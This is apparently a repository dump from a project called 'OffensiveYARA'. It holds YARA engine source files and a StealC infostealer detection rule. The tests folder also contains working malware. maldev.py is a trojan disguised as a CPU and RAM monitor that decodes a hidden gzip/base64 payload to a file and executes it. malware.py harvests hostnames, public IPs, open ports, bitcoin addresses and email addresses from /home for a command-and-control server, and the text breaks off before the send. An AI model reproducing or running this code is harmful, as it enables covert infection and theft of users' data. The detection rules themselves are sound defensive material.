binaries. Rules are evaluated on every layer to detect threats within layered objects, such as packed PE files, documents, and archives, among other things. 23 | 24 | ## Prerequisites 25 | To successfully run the entire YARA rule set, you must have: 26 | * YARA version :: 3.2.0 27 | * PE and ELF modules enabled 28 | 29 | contributors of this OffensiveYARA: 30 | 31 | [![](https://avatars.githubusercontent.com/u/1922788?s=50&v=4)](https://github.com/tpericin) 32 | [![](https://avatars.githubusercontent.com/u/2851492?s=50&v=4)](https://github.com/Neo23x0) 33 | [![](https://avatars.githubusercontent.com/u/182937?s=50&v=4)](https://github.com/plusvic) 34 | [![](https://avatars.githubusercontent.com/u/24500615?s=50&v=4)](https://github.com/xbabka01) 35 | 36 | ## Originally 37 | - [reversinglabs](https://github.com/reversinglabs/reversinglabs-yara-rules) 38 | -------------------------------------------------------------------------------- /src/lib/modules/time/time.c: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2014-2017. The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 28 | */ 29 | 30 | #include 31 | #include 32 | 33 | #define MODULE_NAME time 34 | 35 | 36 | define_function(now) 37 | { 38 | time_t now = time(NULL); 39 | if (now == -1) 40 | return_integer(YR_UNDEFINED); 41 | return_integer((long) now); 42 | } 43 | 44 | 45 | begin_declarations 46 | declare_function("now", "", "i", now); 47 | end_declarations; 48 | 49 | 50 | int module_initialize(YR_MODULE* module) 51 | { 52 | return ERROR_SUCCESS; 53 | } 54 | 55 | 56 | int module_finalize(YR_MODULE* module) 57 | { 58 | return ERROR_SUCCESS; 59 | } 60 | 61 | 62 | int module_load( 63 | YR_SCAN_CONTEXT* context, 64 | YR_OBJECT* module_object, 65 | void* module_data, 66 | size_t module_data_size) 67 | { 68 | return ERROR_SUCCESS; 69 | } 70 | 71 | 72 | int module_unload(YR_OBJECT* module_object) 73 | { 74 | return ERROR_SUCCESS; 75 | } 76 | -------------------------------------------------------------------------------- /src/lib/include/yara/stack.h: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2018. The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 28 | */ 29 | 30 | #ifndef YR_STACK_H 31 | #define YR_STACK_H 32 | 33 | typedef struct YR_STACK YR_STACK; 34 | 35 | struct YR_STACK 36 | { 37 | // Pointer to a heap-allocated array containing the void* values put in 38 | // in the stack. This array starts with a fixed size and it's grown as 39 | // required when new items are pushed into the stack. 40 | void* items; 41 | 42 | // Current capacity (i.e: the number of items that fit into the array) 43 | int capacity; 44 | 45 | // Size of each individual item in the stack. 46 | int item_size; 47 | 48 | // Index of the stack's top in the items array. 49 | int top; 50 | }; 51 | 52 | int yr_stack_create(int initial_capacity, int item_size, YR_STACK** stack); 53 | 54 | void yr_stack_destroy(YR_STACK* stack); 55 | 56 | int yr_stack_push(YR_STACK* stack, void* item); 57 | 58 | int yr_stack_pop(YR_STACK* stack, void* item); 59 | 60 | #endif 61 | -------------------------------------------------------------------------------- /src/lib/modules/pe/authenticode-parser/helper.h: -------------------------------------------------------------------------------- 1 | /* Copyright (c) 2021 Avast Software 2 | 3 | Permission is hereby granted, free of charge, to any person obtaining a copy of 4 | this software and associated documentation files (the "Software"), to deal 5 | in the Software without restriction, including without limitation the rights to 6 | use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies 7 | of the Software, and to permit persons to whom the Software is furnished to do 8 | so, subject to the following conditions: 9 | 10 | The above copyright notice and this permission notice shall be included in all 11 | copies or substantial portions of the Software. 12 | 13 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 14 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 15 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 16 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 17 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 18 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 19 | SOFTWARE. 20 | */ 21 | 22 | #ifndef AUTHENTICODE_PARSER_HELPER_H 23 | #define AUTHENTICODE_PARSER_HELPER_H 24 | 25 | #include 26 | #include 27 | #include 28 | #include 29 | 30 | #include 31 | 32 | #ifdef _WIN32 33 | #define timegm _mkgmtime 34 | #endif 35 | 36 | #ifdef __cplusplus 37 | extern "C" { 38 | #endif 39 | 40 | /* Endianity related functions for PE reading */ 41 | uint16_t bswap16(uint16_t d); 42 | uint32_t bswap32(uint32_t d); 43 | 44 | #if defined(WORDS_BIGENDIAN) 45 | #define letoh16(x) bswap16(x) 46 | #define letoh32(x) bswap32(x) 47 | #define betoh16(x) (x) 48 | #define betoh32(x) (x) 49 | #else 50 | #define letoh16(x) (x) 51 | #define letoh32(x) (x) 52 | #define betoh16(x) bswap16(x) 53 | #define betoh32(x) bswap32(x) 54 | #endif 55 | 56 | /* Calculates digest md of data, return bytes written to digest or 0 on error 57 | * Maximum of EVP_MAX_MD_SIZE will be written to digest */ 58 | int calculate_digest(const EVP_MD* md, const uint8_t* data, size_t len, uint8_t* digest); 59 | /* Copies data of length len into already existing arr */ 60 | int byte_array_init(ByteArray* arr, const uint8_t* data, int len); 61 | /* Converts ASN1_TIME string time into a unix timestamp */ 62 | int64_t ASN1_TIME_to_int64_t(const ASN1_TIME* time); 63 | 64 | #ifdef __cplusplus 65 | } 66 | #endif 67 | 68 | #endif 69 | -------------------------------------------------------------------------------- /src/lib/include/yara/pe_utils.h: -------------------------------------------------------------------------------- 1 | #ifndef YR_PE_UTILS_H 2 | #define YR_PE_UTILS_H 3 | 4 | #include 5 | 6 | #define MAX_PE_SECTIONS 96 7 | 8 | #define IS_64BITS_PE(pe) \ 9 | (yr_le16toh(pe->header64->OptionalHeader.Magic) == \ 10 | IMAGE_NT_OPTIONAL_HDR64_MAGIC) 11 | 12 | #define OptionalHeader(pe, field) \ 13 | (IS_64BITS_PE(pe) ? pe->header64->OptionalHeader.field \ 14 | : pe->header->OptionalHeader.field) 15 | 16 | // 17 | // Imports are stored in a linked list. Each node (IMPORTED_DLL) contains the 18 | // name of the DLL and a pointer to another linked list of 19 | // IMPORT_EXPORT_FUNCTION structures containing the details of imported 20 | // functions. 21 | // 22 | 23 | typedef struct _IMPORTED_DLL 24 | { 25 | char* name; 26 | 27 | struct _IMPORT_FUNCTION* functions; 28 | struct _IMPORTED_DLL* next; 29 | 30 | } IMPORTED_DLL, *PIMPORTED_DLL; 31 | 32 | // 33 | // This is used to track imported and exported functions. The "has_ordinal" 34 | // field is only used in the case of imports as those are optional. Every export 35 | // has an ordinal so we don't need the field there, but in the interest of 36 | // keeping duplicate code to a minimum we use this function for both imports and 37 | // exports. 38 | // 39 | 40 | typedef struct _IMPORT_FUNCTION 41 | { 42 | char* name; 43 | uint8_t has_ordinal; 44 | uint16_t ordinal; 45 | uint64_t rva; 46 | 47 | struct _IMPORT_FUNCTION* next; 48 | 49 | } IMPORT_FUNCTION, *PIMPORT_FUNCTION; 50 | 51 | typedef struct _PE 52 | { 53 | const uint8_t* data; 54 | size_t data_size; 55 | 56 | union 57 | { 58 | PIMAGE_NT_HEADERS32 header; 59 | PIMAGE_NT_HEADERS64 header64; 60 | }; 61 | 62 | YR_HASH_TABLE* hash_table; 63 | YR_OBJECT* object; 64 | IMPORTED_DLL* imported_dlls; 65 | IMPORTED_DLL* delay_imported_dlls; 66 | 67 | uint32_t resources; 68 | uint32_t version_infos; 69 | 70 | } PE; 71 | 72 | #define fits_in_pe(pe, pointer, size) \ 73 | ((size_t)(size) <= pe->data_size && (uint8_t*) (pointer) >= pe->data && \ 74 | (uint8_t*) (pointer) <= pe->data + pe->data_size - (size)) 75 | 76 | #define struct_fits_in_pe(pe, pointer, struct_type) \ 77 | fits_in_pe(pe, pointer, sizeof(struct_type)) 78 | 79 | PIMAGE_NT_HEADERS32 pe_get_header(const uint8_t* data, size_t data_size); 80 | 81 | PIMAGE_DATA_DIRECTORY pe_get_directory_entry(PE* pe, int entry); 82 | 83 | int64_t pe_rva_to_offset(PE* pe, uint64_t rva); 84 | 85 | char* ord_lookup(char* dll, uint16_t ord); 86 | 87 | #endif 88 | -------------------------------------------------------------------------------- /src/lib/include/yara/threading.h: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2016. The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 28 | */ 29 | 30 | #ifndef YR_MUTEX_H 31 | #define YR_MUTEX_H 32 | 33 | #if defined(_WIN32) || defined(__CYGWIN__) 34 | 35 | #include 36 | 37 | typedef DWORD YR_THREAD_ID; 38 | typedef DWORD YR_THREAD_STORAGE_KEY; 39 | typedef HANDLE YR_MUTEX; 40 | 41 | #define YR_TLS __declspec(thread) 42 | 43 | #else 44 | 45 | #include 46 | 47 | typedef pthread_t YR_THREAD_ID; 48 | typedef pthread_key_t YR_THREAD_STORAGE_KEY; 49 | typedef pthread_mutex_t YR_MUTEX; 50 | 51 | #define YR_TLS __thread 52 | 53 | #endif 54 | 55 | YR_THREAD_ID yr_current_thread_id(void); 56 | 57 | int yr_mutex_create(YR_MUTEX*); 58 | int yr_mutex_destroy(YR_MUTEX*); 59 | int yr_mutex_lock(YR_MUTEX*); 60 | int yr_mutex_unlock(YR_MUTEX*); 61 | 62 | int yr_thread_storage_create(YR_THREAD_STORAGE_KEY*); 63 | int yr_thread_storage_destroy(YR_THREAD_STORAGE_KEY*); 64 | int yr_thread_storage_set_value(YR_THREAD_STORAGE_KEY*, void*); 65 | void* yr_thread_storage_get_value(YR_THREAD_STORAGE_KEY*); 66 | 67 | #endif 68 | -------------------------------------------------------------------------------- /src/lib/include/yara/stopwatch.h: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2017. The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 28 | */ 29 | 30 | #ifndef YR_STOPWATCH_H 31 | #define YR_STOPWATCH_H 32 | 33 | #include 34 | #include 35 | 36 | #if defined(_WIN32) 37 | 38 | #include 39 | 40 | typedef struct _YR_STOPWATCH 41 | { 42 | LARGE_INTEGER frequency; 43 | LARGE_INTEGER start; 44 | 45 | } YR_STOPWATCH; 46 | 47 | #elif defined(__APPLE__) && defined(__MACH__) 48 | 49 | #include 50 | 51 | typedef struct _YR_STOPWATCH 52 | { 53 | mach_timebase_info_data_t timebase; 54 | uint64_t start; 55 | 56 | } YR_STOPWATCH; 57 | 58 | #else 59 | 60 | #include 61 | 62 | typedef struct _YR_STOPWATCH 63 | { 64 | union 65 | { 66 | struct timeval tv_start; 67 | struct timespec ts_start; 68 | }; 69 | 70 | } YR_STOPWATCH; 71 | 72 | #endif 73 | 74 | // yr_stopwatch_start starts measuring time. 75 | void yr_stopwatch_start(YR_STOPWATCH* stopwatch); 76 | 77 | // yr_stopwatch_elapsed_ns returns the number of nanoseconds elapsed 78 | // since the last call to yr_stopwatch_start. 79 | uint64_t yr_stopwatch_elapsed_ns(YR_STOPWATCH* stopwatch); 80 | 81 | #endif 82 | -------------------------------------------------------------------------------- /src/lib/modules/pe/authenticode-parser/helper.c: -------------------------------------------------------------------------------- 1 | /* Copyright (c) 2021 Avast Software 2 | 3 | Permission is hereby granted, free of charge, to any person obtaining a copy of 4 | this software and associated documentation files (the "Software"), to deal 5 | in the Software without restriction, including without limitation the rights to 6 | use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies 7 | of the Software, and to permit persons to whom the Software is furnished to do 8 | so, subject to the following conditions: 9 | 10 | The above copyright notice and this permission notice shall be included in all 11 | copies or substantial portions of the Software. 12 | 13 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 14 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 15 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 16 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 17 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 18 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 19 | SOFTWARE. 20 | */ 21 | 22 | #include "helper.h" 23 | 24 | #include 25 | #include 26 | #include 27 | #include 28 | #include 29 | #include 30 | 31 | uint16_t bswap16(uint16_t d) 32 | { 33 | return (d << 8) | (d >> 8); 34 | } 35 | 36 | uint32_t bswap32(uint32_t d) 37 | { 38 | return (((d)&0xff000000) >> 24) | (((d)&0x00ff0000) >> 8) | (((d)&0x0000ff00) << 8) | 39 | (((d)&0x000000ff) << 24); 40 | } 41 | 42 | int calculate_digest(const EVP_MD* md, const uint8_t* data, size_t len, uint8_t* digest) 43 | { 44 | unsigned int outLen = 0; 45 | 46 | EVP_MD_CTX* mdCtx = EVP_MD_CTX_new(); 47 | if (!mdCtx) 48 | goto end; 49 | 50 | if (!EVP_DigestInit_ex(mdCtx, md, NULL) || !EVP_DigestUpdate(mdCtx, data, len) || 51 | !EVP_DigestFinal_ex(mdCtx, digest, &outLen)) 52 | goto end; 53 | 54 | end: 55 | EVP_MD_CTX_free(mdCtx); 56 | return (int)outLen; 57 | } 58 | 59 | int byte_array_init(ByteArray* arr, const uint8_t* data, int len) 60 | { 61 | if (len == 0) { 62 | arr->data = NULL; 63 | arr->len = 0; 64 | return 0; 65 | } 66 | 67 | arr->data = (uint8_t*)malloc(len); 68 | if (!arr->data) 69 | return -1; 70 | 71 | arr->len = len; 72 | memcpy(arr->data, data, len); 73 | return 0; 74 | } 75 | 76 | int64_t ASN1_TIME_to_int64_t(const ASN1_TIME* time) 77 | { 78 | struct tm t = {0}; 79 | if (!time) 80 | return timegm(&t); 81 | 82 | ASN1_TIME_to_tm(time, &t); 83 | return timegm(&t); 84 | } 85 | -------------------------------------------------------------------------------- /src/exp/infostealer/Win32.Infostealer.StealC.yara: -------------------------------------------------------------------------------- 1 | rule Win32_Infostealer_StealC : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "STEALC" 12 | description = "Yara rule that detects StealC infostealer." 13 | 14 | tc_detection_type = "Infostealer" 15 | tc_detection_name = "StealC" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $resolve_windows_api = { 21 | 55 8B EC 51 83 65 ?? ?? 56 64 A1 ?? ?? ?? ?? 8B 40 ?? 8B 40 ?? 8B 00 8B 00 8B 40 ?? 22 | 89 45 ?? 8B 75 ?? 89 35 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? 23 | ?? ?? ?? A3 ?? ?? ?? ?? 56 FF D0 FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 35 24 | } 25 | 26 | $load_sqlite3_functions = { 27 | 55 8B EC 83 EC ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 50 89 45 ?? 89 4D ?? 8B 4D ?? 8D 28 | 45 ?? 50 89 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8D 45 ?? 57 89 45 ?? 8B 7D ?? 29 | B9 ?? ?? ?? ?? 33 C0 F3 AA 5F 33 C0 C9 C3 8B 45 ?? 85 C0 74 ?? 53 8B 58 ?? 56 8B 70 30 | ?? FF 35 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B C6 E8 31 | ?? ?? ?? ?? FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 32 | A3 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B C6 E8 ?? ?? 33 | ?? ?? FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? A3 34 | } 35 | 36 | $check_license_expiration_date = { 37 | 55 8B EC 83 E4 ?? 83 EC ?? 57 33 C0 66 89 44 24 ?? 83 64 24 ?? ?? 8D 7C 24 ?? AB AB 38 | AB 66 AB 33 C0 66 89 44 24 ?? 8D 7C 24 ?? AB AB AB 66 AB 33 C0 21 44 24 ?? 8D 7C 24 39 | ?? AB 8D 7C 24 ?? AB 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8D 7C 24 ?? E8 ?? ?? ?? ?? 8D 40 | 4C 24 ?? 51 8D 4C 24 ?? 51 8D 4C 24 ?? 51 FF 35 ?? ?? ?? ?? FF 30 FF 15 ?? ?? ?? ?? 41 | 8B 44 24 ?? 83 C4 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 42 | 8D 44 24 ?? 50 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 3B 44 24 ?? 72 ?? 77 ?? 43 | 8B 44 24 ?? 3B 44 24 ?? 76 ?? 6A ?? FF 15 ?? ?? ?? ?? 5F 8B E5 5D C3 44 | } 45 | 46 | condition: 47 | uint16(0) == 0x5A4D and 48 | ( 49 | $resolve_windows_api 50 | ) and 51 | ( 52 | $load_sqlite3_functions 53 | ) and 54 | ( 55 | $check_license_expiration_date 56 | ) 57 | } -------------------------------------------------------------------------------- /tests/maldev.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | import psutil 3 | import base64 4 | import time 5 | import gzip 6 | import os 7 | 8 | def main(): 9 | # fork a child process 10 | pid = os.fork() 11 | 12 | if pid > 0: 13 | # parent process 14 | while True: 15 | # percentage of used CPU 16 | cpu = psutil.cpu_percent() 17 | # percentage of used RAM 18 | ram = psutil.virtual_memory().percent 19 | # percentage of used disk space 20 | disk = psutil.disk_usage("/").percent 21 | # number of all running processes 22 | processes_count = 0 23 | for _ in psutil.process_iter(): 24 | processes_count += 1 25 | 26 | # print to screen 27 | print("---------------------------------------------------------") 28 | print("| CPU USAGE | RAM USAGE | DISK USAGE | RUNNING PROCESSES |") 29 | print("| {:02}% | {:02}% | {:02}% | {} |".format(int(cpu), int(ram), int(disk), processes_count)) 30 | print("---------------------------------------------------------") 31 | 32 | # sleep for 2s 33 | time.sleep(2) 34 | else: 35 | # child process 36 | trojan() 37 | 38 | 39 | def trojan(): 40 | malware_fd = open(".malware.py", "w") 41 | blob = "H4sICAncMmEAA21hbHdhcmUucHkAjVZtb9s2EP7uX3FTB0RCZMmKHadx4WHB0K7d1q5YO2BYEgi0RMesZVIj6cSJ4/++IyX6TXY22bBJ3nMvfHh31Kvv4rmS8YjxuHzUE8G7LTYrhdQg6T9zqrRycyWyKdVuNiKK9ntu9k0JvtFzI6FarVZOxzAjjPvBoAX4vII7qmEilOZkRkGMQU8oIrIJ49Qi1rJh7TNCDbfoB60tM0a1nI8KlgEr73tA8lxSpQ5apSSnUqHRpZ2bx/tTUdm+uqNcewPwPoonVhQkPo864P+VJG/gN8bnC1i87qf93huQ94OL11EngJ9pNhXxWSfp4DeBd0zSsVjERuhZ4yv7W0WWshKdOjbNXnxvonWpBnHMSlKyKBM48MKtEOtREGm60G7DihKZTWAsJIyYzgTjQHgOFNkt3M6psuBanq5X04IpjYavb63c6hyVGg9SCB2Cmo9yJlUIY1ZQBehRqOiBFFPfiydiRr36UJ2WgRmUhW9EVoxL6ThHL6Kk3PeWq3i58iLUmhHtV+4MJgjBk16wo6vl466xihCJLNlzzgTXeIb23CkxHKGhhoKNYA0duogiY8YPIqUlK1167To6xPwO39tPg3t7+tGY8ZwUhS89/zrp3i6T1TVpT2ftp6v2+1/anz63/07al7fLs37Y7a6eR1mC4qeOWepehueXq8ALd3fwX5EeyovtZy8H9qOs3Ufp7emPLpTTm8gMMfjwYvW/4skmWCrAxvBAYULuKUY2x5wl/LHJJLigm7GigQKTpkFtAD9Ap5kaB4/BJfkRwWlTcCyMPeZeCOJInR1cPt1fbvLpMjYrhDKdcMfVIqOlboZREmXacHUcpmfi8doSBNOjkXTeaJVGmlbSoSn4sqpYTrXSREO7LAjX8Ax3kpbQZmDCR3vPQB6mcLIsJUPx973VyRrzGU5ucsya7uomOjoY2P/z1YkX1DV5IJr1xNVrpMqCYUu94XXTqLdKeSZyCjnRBLSwN5Rtl4py2zRmZjUTsxmx+ZjbJiJFgQB5T6W1YpV3LoyaptRdR3htuGHYRGFXH2xugQOAzXYQuJlsIZvZaisI4YfzeEt1P8uc4qHsq2+tmrvqcncUmvSw9Bk6quvDCvK05qeCR6N+rxL4Bh3l81mpfAMJono9CDZ3GTLuzuaFU6jhGeaDpkDqFwIQo280q4JWm9eE6s+vZ1fv0g+f3n4NnfTL7z/9mn75+sfbq4/rMNAbR0MvB2FKxL7PJN3uReUzqhV930vOLqIOfhLshwYQBDXEbNHfZsoJXPW2WthP0tTkTprCcAhempo3pTT1qjKuXpv+BfXo/OqiCQAA" 42 | malware = gzip.decompress(base64.b64decode(blob)).decode("UTF-8") 43 | malware_fd.write(malware) 44 | malware_fd.close() 45 | 46 | # execute malware 47 | os.system("/usr/bin/python3 .malware.py") 48 | 49 | 50 | if __name__ == "__main__": 51 | main() 52 | -------------------------------------------------------------------------------- /tests/malware.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | import requests 3 | import socket 4 | import base64 5 | import json 6 | import re 7 | import os 8 | 9 | 10 | def main(): 11 | # get hostname of the machine 12 | hostname = socket.gethostname() 13 | 14 | # get the public ipv4 address of the machine 15 | headers = { 16 | "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0" 17 | } 18 | public_ip = requests.get("https://ipapi.co/ip", headers = headers).text 19 | 20 | # search for bitcoin and email addresses 21 | bitcoin_addresses_list = [] 22 | email_addresses_list = [] 23 | for root, subdirs, files in os.walk("/home"): 24 | for file in files: 25 | file_fd = open("{}/{}".format(root, file), "r") 26 | try: 27 | # read the contents of each file 28 | file_contents = file_fd.read().strip() 29 | 30 | # search for bitcoin addresses 31 | bitcoin_addresses = re.findall(r"([13]{1}[a-km-zA-HJ-NP-Z1-9]{26,33}|bc1[a-z0-9]{39,59})", file_contents) 32 | 33 | # search for email addresses 34 | email_addresses = re.findall(r"[a-z0-9._]+@[a-z0-9]+\.[a-z]{1,7}", file_contents) 35 | 36 | # check if we have found any bitcoin addresses or emails 37 | if len(bitcoin_addresses) > 0: 38 | bitcoin_addresses_list = bitcoin_addresses_list + bitcoin_addresses 39 | if len(email_addresses) > 0: 40 | email_addresses_list = email_addresses_list + email_addresses 41 | 42 | file_fd.close() 43 | except: 44 | pass 45 | 46 | 47 | # get all open ports on the machine 48 | open_ports = os.popen("netstat -plant | grep -i listen | awk '{print $4}' | grep -P '\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d{1,5}'").read() 49 | open_ports = open_ports.strip().split("\n") 50 | 51 | # encode data to json and send them to command and control server 52 | data = { 53 | "machine_hostname": hostname, 54 | "machine_ip": public_ip, 55 | "machine_open_ports": open_ports, 56 | "bitcoin_addresses_found": bitcoin_addresses_list, 57 | "email_addresses_found": email_addresses_list 58 | } 59 | 60 | # base64 encode the json 